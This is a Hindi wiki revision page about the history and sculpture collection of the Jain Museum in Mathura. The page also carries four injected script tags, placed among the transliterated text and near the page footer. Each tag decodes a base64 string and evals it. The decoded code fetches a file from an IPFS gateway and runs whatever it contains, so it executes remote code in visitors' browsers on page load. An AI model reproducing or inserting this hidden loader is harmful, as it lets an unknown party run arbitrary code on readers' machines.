Difference between revisions of "जैन संग्रहालय, मथुरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "डा." to "डॉ.")
 
(19 intermediate revisions by 6 users not shown)
Line 1: Line 1:
[[चित्र:Museum-Mathura-1.jpg|राजकीय जैन संग्रहालय, [[मथुरा]]<br />Govt. Jain Museum, Mathura|thumb|250px]]
+
{{सूचना बक्सा संग्रहालय
प्रारम्भ में यह संग्रहालय स्थानीय तहसील के पास एक छोटे भवन में रखा गया था। कुछ परिवर्तनों के बाद सन् 1881 में उसे जनता के लिए खोल दिया गया। सन् 1900 में संग्रहालय का प्रबन्ध नगरपालिका के हाथ में दिया गया। इसके पांच वर्ष बाद तत्कालीन पुरातत्त्व अधिकारी डा. जे. पी. एच. फोगल के द्वारा इस संग्रहालय की मूर्तियों का वर्गीकरण किया गया और सन् 1910 में एक विस्तृत सूची प्रकाशित की गई। इस कार्य से संग्रहालय का महत्त्व शासन की दृष्टि में बढ़ गया और सन् 1912 में इसका सारा प्रबन्ध राज्य सरकार ने अपने हाथ में ले लिया। सन् 1908 से रायबहादुर पं. राधाकृष्ण यहां के प्रथम सहायक संग्रहालय अध्यक्ष के रूप में नियुक्त हुए, बाद में वे अवैतनिक संग्रहाध्यक्ष हो गये। अब संग्रहालय की उन्नति होने लगी, जिसमें तत्कालीन पुरातत्त्व निदेशक सर जॉन मार्शल और रायबहादुर दयाराम साहनी का बहुत बड़ा हाथ था। सन् 1929 में प्रदेशीय शासन ने एक लाख छत्तीस हज़ार रुपया लगाकर स्थानीय डैम्पियर पार्क में संग्रहालय का सम्मुख भाग बनवाया और सन् 1930 में यह जनता के लिए खोला गया। इसके बाद ब्रिटिश शासन काल में यहां कोई नवीन परिर्वतन नहीं हुआ।  
+
|चित्र=Museum-Mathura-1.jpg
----
+
|चित्र का नाम=राजकीय जैन संग्रहालय, मथुरा
[[भारत]] का शासन सत्र सन् 1947 में जब अपने हाथ में आया तब से अधिकारियों का ध्यान इस सांस्कृतिक तीर्थ की उन्नति की ओर भी गया। द्वितीय पंचवर्षीय योजना में इसकी उन्नति के लिए अलग धनराशि की व्यवस्था की गयी और कार्य भी प्रारम्भ हुआ। सन् 1958 से कार्य की गति तीव्र हुई। पुराने भवन की छत का नवीनीकरण हुआ और साथ ही साथ सन् 1930 का अधूरा बना हुआ भवन पूरा किया गया। वर्तमान स्थिति में अष्टकोण आकार का एक सुन्दर भवन उद्यान के बीच स्थित है । इनमें 34 फीट चौड़ी सुदीर्घ दरीची बनाई गई है और प्रत्येक कोण पर एक छोटा षट्कोण कक्ष भी बना है। शीघ्र ही मथुरा कला का यह विशाल संग्रह पूरे वैभव के साथ सुयोग्य वैज्ञानिक उपकरणों की सहायता से यहाँ प्रदर्शित होगा। शासन इससे आगे बढ़ने की इच्छा रखता है और परिस्थिति के अनुरूप इस संग्रहालय में व्याख्यान कक्ष, ग्रंथालय, दर्शकों का विश्राम स्थान आदि की स्वतंत्र व्यवस्था की जा रही है। इसके अतिरिक्त कला प्रेमियों की सुविधा के लिए मथुरा कला की प्रतिकृतियां और छायाचित्रों को लागत मूल्य पर देने की वर्तमान व्यवस्था में भी अधिक सुविधाएं देने की योजना है।
+
|विवरण= प्रारम्भ में यह संग्रहालय स्थानीय तहसील के पास एक छोटे भवन में रखा गया था। कुछ परिवर्तनों के बाद सन् 1881 में उसे जनता के लिए खोल दिया गया।
==जैन संग्रहालय मथुरा वीथिका==
+
|राज्य=[[उत्तर प्रदेश]]
<gallery widths="145px" perrow="4">
+
|नगर=[[मथुरा]]
 +
|निर्माण=
 +
|स्थापना=1861 ई.
 +
|भौगोलिक स्थिति= 27°28'18" उत्तर और  77°41'39" पूर्व
 +
|मार्ग स्थिति=
 +
|प्रसिद्धि=
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=
 +
|बाहरी कड़ियाँ=[http://wikimapia.org/27006405/Jain-Museum Jain Museum (Mathura)]
 +
|अद्यतन=
 +
}}
 +
'''जैन संग्रहालय मथुरा''' [[उत्तर प्रदेश]] के [[मथुरा]] नगर में स्थित है। प्रारम्भ में यह संग्रहालय स्थानीय तहसील के पास एक छोटे भवन में रखा गया था। कुछ परिवर्तनों के बाद सन् 1881 में उसे जनता के लिए खोल दिया गया। सन् [[1900]] में संग्रहालय का प्रबन्ध नगरपालिका के हाथ में दिया गया। इसके पांच वर्ष बाद तत्कालीन [[पुरातत्त्व]] अधिकारी डॉ. जे. पी. एच. फोगल के द्वारा इस संग्रहालय की मूर्तियों का वर्गीकरण किया गया और सन् [[1910]] में एक विस्तृत सूची प्रकाशित की गई। इस कार्य से संग्रहालय का महत्त्व शासन की दृष्टि में बढ़ गया और सन् [[1912]] में इसका सारा प्रबन्ध राज्य सरकार ने अपने हाथ में ले लिया। सन् [[1908]] से रायबहादुर पं. राधाकृष्ण यहाँ के प्रथम सहायक संग्रहालय अध्यक्ष के रूप में नियुक्त हुए, बाद में वे अवैतनिक संग्रहाध्यक्ष हो गये। अब संग्रहालय की उन्नति होने लगी, जिसमें तत्कालीन पुरातत्त्व निदेशक सर जॉन मार्शल और रायबहादुर दयाराम साहनी का बहुत बड़ा हाथ था। सन् [[1929]] में प्रदेशीय शासन ने एक लाख छत्तीस हज़ार रुपया लगाकर स्थानीय डैम्पियर पार्क में संग्रहालय का सम्मुख भाग बनवाया और सन् 1930 में यह जनता के लिए खोला गया। इसके बाद ब्रिटिश शासन काल में यहाँ कोई नवीन परिर्वतन नहीं हुआ।  
 +
==भारत की आज़ादी के बाद==
 +
[[भारत]] का शासन सत्र सन् [[1947]] में जब अपने हाथ में आया तब से अधिकारियों का ध्यान इस सांस्कृतिक तीर्थ की उन्नति की ओर भी गया। द्वितीय पंचवर्षीय योजना में इसकी उन्नति के लिए अलग धनराशि की व्यवस्था की गयी और कार्य भी प्रारम्भ हुआ। सन् [[1958]] से कार्य की गति तीव्र हुई। पुराने भवन की छत का नवीनीकरण हुआ और साथ ही साथ सन् 1930 का अधूरा बना हुआ भवन पूरा किया गया। वर्तमान स्थिति में अष्टकोण आकार का एक सुन्दर भवन उद्यान के बीच स्थित है। इनमें 34 फीट चौड़ी सुदीर्घ दरीची बनाई गई है और प्रत्येक कोण पर एक छोटा षट्कोण कक्ष भी बना है। शीघ्र ही [[मथुरा]] कला का यह विशाल संग्रह पूरे वैभव के साथ सुयोग्य वैज्ञानिक उपकरणों की सहायता से यहाँ प्रदर्शित होगा। शासन इससे आगे बढ़ने की इच्छा रखता है और परिस्थिति के अनुरूप इस संग्रहालय में व्याख्यान कक्ष, ग्रंथालय, दर्शकों का विश्राम स्थान आदि की स्वतंत्र व्यवस्था की जा रही है। इसके अतिरिक्त कला प्रेमियों की सुविधा के लिए मथुरा कला की प्रतिकृतियां और छायाचित्रों को लागत मूल्य पर देने की वर्तमान व्यवस्था में भी अधिक सुविधाएं देने की योजना है।
 +
==जैन संग्रहालय मथुरा चित्र वीथिका==
 +
<gallery>
 
चित्र:Bust-of-Jina-Jain-Museum-Mathura-2.jpg|जैन प्रतिमा का धड़<br /> Bust of Jina
 
चित्र:Bust-of-Jina-Jain-Museum-Mathura-2.jpg|जैन प्रतिमा का धड़<br /> Bust of Jina
 
चित्र:Head-of-Jina-Jain-Museum-Mathura-4.jpg|जैन मस्तक<br /> Head of a Jina
 
चित्र:Head-of-Jina-Jain-Museum-Mathura-4.jpg|जैन मस्तक<br /> Head of a Jina
 
चित्र:Seated-Jain-Tirthankara-Jain-Museum-Mathura-3.jpg|आसनस्थ जैन तीर्थंकर <br /> Seated Jaina Tirthankara
 
चित्र:Seated-Jain-Tirthankara-Jain-Museum-Mathura-3.jpg|आसनस्थ जैन तीर्थंकर <br /> Seated Jaina Tirthankara
 
चित्र:Sarvato-Bhadrrika-Jain-Museum-Mathura-7.jpg|सर्वतोभद्रिका<br /> Sarvato Bhadrrika
 
चित्र:Sarvato-Bhadrrika-Jain-Museum-Mathura-7.jpg|सर्वतोभद्रिका<br /> Sarvato Bhadrrika
चित्र:Stele-With-Nude-Jinas-Jain-Museum-Mathura-8.jpg|तीर्थंकर युक्त चौमुखी<br /> Stele With Nude Jinas
+
चित्र:Thirthankara-Rishabhanath-Jain-Museum-Mathura-1.jpg|[[ॠषभनाथ तीर्थंकर|प्रथम तीर्थंकर ऋषभनाथ]]<br /> 1st Tirthankara Rishabhanatha
चित्र:Thirthankara-Rishabhanath-Jain-Museum-Mathura-1.jpg|प्रथम तीर्थंकर ऋषभनाथ<br /> 1st Tirthankara Rishabhanatha
 
 
चित्र:Headless-Jaina-Tirthankara-Jain-Museum-Mathura-5.jpg|सिर विहीन जैन तीर्थंकर<br /> Headless Jaina Tirthankara
 
चित्र:Headless-Jaina-Tirthankara-Jain-Museum-Mathura-5.jpg|सिर विहीन जैन तीर्थंकर<br /> Headless Jaina Tirthankara
 
चित्र:Inscribed-Jaina-Tirthankara-Kayotsaf-Mudra-Jain-Museum-Mathura-6.jpg|तीर्थंकर प्रतिमा<br />Jaina Tirthankara
 
चित्र:Inscribed-Jaina-Tirthankara-Kayotsaf-Mudra-Jain-Museum-Mathura-6.jpg|तीर्थंकर प्रतिमा<br />Jaina Tirthankara
 +
चित्र:23rd-Tirthankara-Parsvanatha-Jain-Museum-Mathura-9.jpg|तीर्थंकर पार्श्वनाथ <br /> Tirthankara Parsvanatha
 +
चित्र:22-Tirthankara-Neminatha-Jain-Museum-Mathura-10.jpg|तीर्थंकर नेमिनाथ<br /> Tirthankara Neminatha
 +
चित्र:Seated-Jain-Tirthankara-Jain-Museum-Mathura-11.jpg|आसनस्थ जैन तीर्थंकर<br /> Seated Jaina Tirthankara
 +
चित्र:Jain-Tirthankara-Jain-Museum-Mathura-15.jpg|जैन तीर्थंकर <br /> Jaina Tirthankara
 +
चित्र:Yugaliya-Jain-Museum-Mathura-12.jpg|युगलिया <br /> Yugaliya
 +
चित्र:Seated-Jain-Tirthankara-Jain-Museum-Mathura-14.jpg|आसनस्थ जैन तीर्थंकर <br /> Seated Jaina Tirthankara
 +
चित्र:Seated-Jain-Tirthankara-In-Meditation-Jain-Museum-Mathura-15.jpg|ध्यान मुद्रा में जैन तीर्थंकर<br /> Seated Jaina Tirthankara In Meditation
 +
चित्र:Seated-Jain-Tirthankara-Jain-Museum-Mathura-16.jpg|आसनस्थ जैन तीर्थंकर <br /> Seated Jaina Tirthankara
 +
चित्र:Head-of-Jina-Jain-Museum-Mathura-17.jpg|जैन मस्तक <br /> Head of a Jina
 +
चित्र:Upper-Half-Part-of-Tirthankara-18.jpg|तीर्थंकर प्रतिभा का ऊपरी भाग <br /> Upper Half Part of a Tirthankara
 +
चित्र:Seated-Jain-Tirthankara-Jain-Museum-Mathura-19.jpg|आसनस्थ जैन तीर्थंकर <br /> Seated Jaina Tirthankara
 +
चित्र:Rishabhanatha-Jain-Museum-Mathura-20.jpg|ॠषभ नाथ <br /> Rishabhanatha
 +
चित्र:Seated-Jain-Tirthankara-Jain-Museum-Mathura-21.jpg|आसनस्थ जैन तीर्थंकर <br /> Seated Jaina Tirthankara
 +
चित्र:Head-of-Jina-Jain-Museum-Mathura-22.jpg|जैन मस्तक <br /> Head of a Jina
 +
चित्र:Seated-Jain-Tirthankara-Jain-Museum-Mathura-23.jpg|आसनस्थ जैन तीर्थंकर <br /> Seated Jaina Tirthankara
 +
चित्र:Headless-Jaina-Tirthankara-Jain-Museum-Mathura-24.jpg|सिर विहीन जैन तीर्थंकर<br /> Headless Jaina Tirthankara
 +
चित्र:Jain-Tirthankara-Rishabhanatha-Jain-Museum-Mathura-25.jpg|[[ॠषभनाथ तीर्थंकर|जैन तीर्थंकर ऋषभनाथ]]<br /> Jaina Tirthankara Rishabhanatha
 +
चित्र:Torso-of-Jina-Image-Jain-Museum-Mathura-26.jpg|जैन प्रतिमा का धड़ <br /> Torso of Jina Image
 +
चित्र:Ayagapatta-with-Miniature-Tirthankara-and-Others-Sacred-Symbols-Jain-Museum-Mathura-27.jpg|जैन आयागपट्ट <br /> Jain Tablet
 +
चित्र:Jaina-Tablet-Homage-Vasu-Daughter-Courtesan-Lavanasobhika-Jain-Museum-Mathura-28.jpg|जैन आयागपट्ट <br /> Jain Tablet
 +
चित्र:Goat-Headed-Jaina-Mother-Goddess-Jain-Museum-Mathura-29.jpg|अजमुखी जैन मातृदेवी <br /> Goat Headed Jaina Mother Goddess
 +
चित्र:Seated-Jain-Tirthankara-Jain-Museum-Mathura-30.jpg|आसनस्थ जैन तीर्थंकर <br /> Seated Jaina Tirthankara
 +
चित्र:Headless-Jaina-Tirthankara-Jain-Museum-Mathura-31.jpg|सिर विहीन जैन प्रतिभा<br /> Headless Image of Jina
 +
चित्र:Lower-Part-Jaina-Tirthankara-Jain-Museum-Mathura-32.jpg|जैन प्रतिमा का अधोभाग <br /> Lower Part of Jaina Tirthankara
 +
चित्र:Bust-of-Jina-Jain-Museum-Mathura-33.jpg|जैन प्रतिमा का धड़<br /> Bust of Jina
 +
चित्र:Head-of-Jina-Tirthankara-Jain-Museum-Mathura-34.jpg|जैन मस्तक<br /> Head of a Jina Tirthankara
 +
चित्र:Head-of-Jina-Tirthankara-Jain-Museum-Mathura-35.jpg|जैन मस्तक<br /> Head of a Jina
 +
चित्र:Head-of-Jina-Jain-Museum-Mathura-36.jpg|जैन मस्तक<br /> Head of a Jina
 +
चित्र:Headless-Jaina-Tirthankara-Jain-Museum-Mathura-37.jpg|सिर विहीन जैन प्रतिभा<br /> Headless Jina Tirthankara
 +
चित्र:Seated-Rishabhanath-Jain-Museum-Mathura-38.jpg|[[ॠषभनाथ तीर्थंकर|आसनस्थ ऋषभनाथ]]<br /> Seated Rishabhanatha
 +
चित्र:Head-of-Jina-Jain-Museum-Mathura-39.jpg|जैन मस्तक<br /> Head of a Jina
 +
चित्र:Jaina-Tirthankara-Jain-Museum-Mathura-40.jpg|जैन प्रतिभा<br />Jaina Tirthankara
 +
चित्र:Torso-of-Jina-Jain-Museum-Mathura-41.jpg|जैन प्रतिमा का धड़<br /> Torso of a Jina
 +
चित्र:Seated-Jain-Tirthankara-Jain-Museum-Mathura-42.jpg|आसनस्थ जैन तीर्थंकर <br /> Seated Jaina Tirthankara
 +
चित्र:Head-of-Jina-Jain-Museum-Mathura-43.jpg|जैन मस्तक<br /> Head of a Jina
 +
चित्र:Seated-Image-of-Jina-Jain-Museum-Mathura-44.jpg|आसनस्थ जैन तीर्थंकर<br /> Seated Image of Jina
 +
चित्र:Upper-Part-of-Jina-Jain-Museum-Mathura-45.jpg|जैन प्रतिमा का ऊपरी भाग<br /> Upper Part of a Jina
 +
चित्र:Seated-Jaina-Tirthankara-Jain-Museum-Mathura-46.jpg|आसनस्थ जैन तीर्थंकर <br /> Seated Jaina Tirthankara
 +
चित्र:Head-of-Jina-Jain-Museum-Mathura-47.jpg|जैन मस्तक<br /> Head of a Jina
 
</gallery>
 
</gallery>
==सम्बंधित लिंक==
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक3 |माध्यमिक= |पूर्णता= |शोध= }}
{{जैन धर्म}}
+
==संबंधित लेख==
{{जैन धर्म2}}
+
{{जैन धर्म2}}{{ब्रज के दर्शनीय स्थल}}{{संग्रहालय}}{{जैन धर्म}}
[[Category:जैन धर्म]]
+
[[Category:जैन धर्म]][[Category:जैन धर्म कोश]][[Category:धर्म कोश]]
[[Category:जैन धर्म कोश]]
+
[[Category:संग्रहालय]]
 
[[Category:संग्रहालय कोश]]
 
[[Category:संग्रहालय कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 09:49, 4 February 2021

jain sangrahalay, mathura
vivaran prarambh mean yah sangrahalay sthaniy tahasil ke pas ek chhote bhavan mean rakha gaya tha. kuchh parivartanoan ke bad sanh 1881 mean use janata ke lie khol diya gaya.
rajy uttar pradesh
nagar mathura
sthapana 1861 ee.
bhaugolik sthiti 27°28'18" uttar aur 77°41'39" poorv
bahari k diyaan Jain Museum (Mathura)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jain sangrahalay mathura uttar pradesh ke mathura nagar mean sthit hai. prarambh mean yah sangrahalay sthaniy tahasil ke pas ek chhote bhavan mean rakha gaya tha. kuchh parivartanoan ke bad sanh 1881 mean use janata ke lie khol diya gaya. sanh 1900 mean sangrahalay ka prabandh nagarapalika ke hath mean diya gaya. isake paanch varsh bad tatkalin puratattv adhikari d aau. je. pi. ech. phogal ke dvara is sangrahalay ki moortiyoan ka vargikaran kiya gaya aur sanh 1910 mean ek vistrit soochi prakashit ki gee. is kary se sangrahalay ka mahattv shasan ki drishti mean badh gaya aur sanh 1912 mean isaka sara prabandh rajy sarakar ne apane hath mean le liya. sanh 1908 se rayabahadur pan. radhakrishna yahaan ke pratham sahayak sangrahalay adhyaksh ke roop mean niyukt hue, bad mean ve avaitanik sangrahadhyaksh ho gaye. ab sangrahalay ki unnati hone lagi, jisamean tatkalin puratattv nideshak sar j aaun marshal aur rayabahadur dayaram sahani ka bahut b da hath tha. sanh 1929 mean pradeshiy shasan ne ek lakh chhattis hazar rupaya lagakar sthaniy daimpiyar park mean sangrahalay ka sammukh bhag banavaya aur sanh 1930 mean yah janata ke lie khola gaya. isake bad british shasan kal mean yahaan koee navin parirvatan nahian hua.

bharat ki azadi ke bad

bharat ka shasan satr sanh 1947 mean jab apane hath mean aya tab se adhikariyoan ka dhyan is saanskritik tirth ki unnati ki or bhi gaya. dvitiy panchavarshiy yojana mean isaki unnati ke lie alag dhanarashi ki vyavastha ki gayi aur kary bhi prarambh hua. sanh 1958 se kary ki gati tivr huee. purane bhavan ki chhat ka navinikaran hua aur sath hi sath sanh 1930 ka adhoora bana hua bhavan poora kiya gaya. vartaman sthiti mean ashtakon akar ka ek sundar bhavan udyan ke bich sthit hai. inamean 34 phit chau di sudirgh darichi banaee gee hai aur pratyek kon par ek chhota shatkon kaksh bhi bana hai. shighr hi mathura kala ka yah vishal sangrah poore vaibhav ke sath suyogy vaijnanik upakaranoan ki sahayata se yahaan pradarshit hoga. shasan isase age badhane ki ichchha rakhata hai aur paristhiti ke anuroop is sangrahalay mean vyakhyan kaksh, granthalay, darshakoan ka vishram sthan adi ki svatantr vyavastha ki ja rahi hai. isake atirikt kala premiyoan ki suvidha ke lie mathura kala ki pratikritiyaan aur chhayachitroan ko lagat mooly par dene ki vartaman vyavastha mean bhi adhik suvidhaean dene ki yojana hai.

jain sangrahalay mathura chitr vithika

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>